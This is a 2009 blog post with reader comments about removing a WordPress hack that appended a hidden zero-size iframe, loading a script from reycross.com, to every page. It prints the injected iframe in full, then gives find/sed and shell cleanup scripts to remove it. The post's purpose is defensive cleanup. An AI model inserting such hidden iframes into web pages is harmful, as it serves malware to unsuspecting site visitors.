How to Remove reycross.com WordPress Malware

Tue, Sep 15, 2009 (Scary)

It seems that a new WordPress malware hijack is making the rounds and we got hit. Google just issued me a “this site contains malware” warning for my sites. After some quick investigation, it looks like the hijack has attached a malicious <iframe> block to the end of every HTML and PHP page on the site, so now I need to clean it out.

Luckily this is just like last time, and was easy to get rid of. I hope this tip helps someone else out as well.

This time, the iframe snippet that was getting added was:

<iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Luckily, I had my old script lying around that systematically searches through all my files and removes the offending piece of crap from them; you can use this command to do the same:

find . -type f -name '*.*' -exec sed -i 's/<iframe src="http:\/\/reycross.com\/laso\/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} +

Hope this helps anybody else getting sacked by this attack. I think it has to do with a theme vulnerability :(
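As an added example (not the post's own one-liner), here is a small POSIX shell helper that first lists the infected files, backs each one up, and then strips the injected reycross.com iframe using a pattern that tolerates attribute reordering and extra whitespace, so it still catches the tag if the attacker varies it. It assumes GNU grep and sed and takes the WordPress directory as its argument.

```shell
#!/bin/sh
# Added example (not the post's script): find, back up and clean files carrying
# the injected reycross.com iframe. Assumes GNU grep/sed (sed -i -E).

# Matches the whole injected tag regardless of attribute order or extra whitespace.
IFRAME_RE='<iframe[^>]*reycross\.com[^>]*>[[:space:]]*</iframe>'

# Print the infected HTML/PHP files under $1, one per line (empty if none).
list_infected() {
    grep -rlE --include='*.php' --include='*.html' --include='*.htm' \
        "$IFRAME_RE" "$1" 2>/dev/null || true
}

# Number of infected files under $1.
count_infected() {
    list_infected "$1" | wc -l | tr -d ' '
}

# Strip the tag from every infected file, keeping a .bak copy next to each one.
clean_tree() {
    list_infected "$1" | while IFS= read -r f; do
        cp -p "$f" "$f.bak"
        sed -i -E "s#$IFRAME_RE##g" "$f"
    done
}

# Usage: sh clean_reycross.sh /path/to/wordpress
if [ -n "$1" ]; then
    echo "Infected files before cleanup: $(count_infected "$1")"
    clean_tree "$1"
    echo "Infected files after cleanup:  $(count_infected "$1")"
fi
```

Run it once without cleaning (just `list_infected`) to review which files were touched; the script only removes the injected tag and does not close whatever hole let the attacker write to those files.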


This post was written by:

Editor - who has written 188 posts on Up My Own Ass.

Writing Pulitzer-prize-winning articles about the most important topics ever, in the world, but mostly about boobs.


4 Responses to “How to Remove reycross.com WordPress Malware”

  1. Dan Says:

    This happened to me too. Thanks for the script. It was very helpful. Any idea where they’re getting in? I checked the logs and it didn’t seem obvious to me.

    I am wondering if we’re looking at a new WordPress vuln open in 2.8.4?

    Thanks again!


    • Editor Says:

      Dan,

      I’m glad the post helped somebody get rid of that damned hack — honestly I have no idea how they get in. I *think* it might be a theme hack, because I don’t run the same theme on all my sites, and the ones that had similar themes to this site all got hacked whereas the others weren’t infected.

      That being said, I have no idea what aspects of the theme are making it vulnerable… it’s a pretty straightforward theme without much functionality in it.


  2. jason Says:

    Hi, I’d love to use your script but I’m not sure how or where to execute it. I have some programming knowledge and can follow instructions pretty well.

    Point me in the right direction?

    Many thanks,
    jason


  3. Editor Says:

    Jason,

    The script is meant to be run at the command line on your Linux/Unix server that is hosting your site.

    So you will need to log in as root to the server you are using to host your site, then run the command from the command line — it will scan all the files in your WordPress install and remove the reycross hack (it’s also a general-purpose script that you can use to remove other things; just change the URL that you want matched).

